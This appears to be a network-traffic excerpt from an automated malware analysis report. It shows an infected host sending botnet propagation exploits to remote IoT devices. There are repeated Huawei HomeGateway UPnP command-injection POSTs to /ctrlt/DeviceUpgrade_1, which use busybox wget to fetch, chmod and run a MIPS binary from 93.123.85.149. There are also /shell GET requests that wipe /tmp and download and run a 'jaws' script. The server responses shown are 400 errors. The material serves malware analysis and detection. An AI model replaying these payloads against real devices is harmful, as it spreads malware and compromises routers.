                                                            Jan 26, 2024 15:31:19.034784079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:19.365778923 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:19 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:19 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 32 34 33 31 61 31 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 39 26 23 34 36 3b 31 30 37 36 63 38 34 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;772431a1&#46;1706279479&#46;1076c84c</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            65192.168.2.2352330156.241.113.19637215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:19.037266970 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:20.744959116 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:22.760700941 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:26.952080011 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:35.142973900 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:51.268656015 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:23.776093960 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            66192.168.2.2359280156.250.15.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:19.040568113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:19.376319885 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:30:47 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                            Jan 26, 2024 15:31:20.428694010 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:30:47 GMT
                                                            Connection: close
                                                            Content-Length: 311
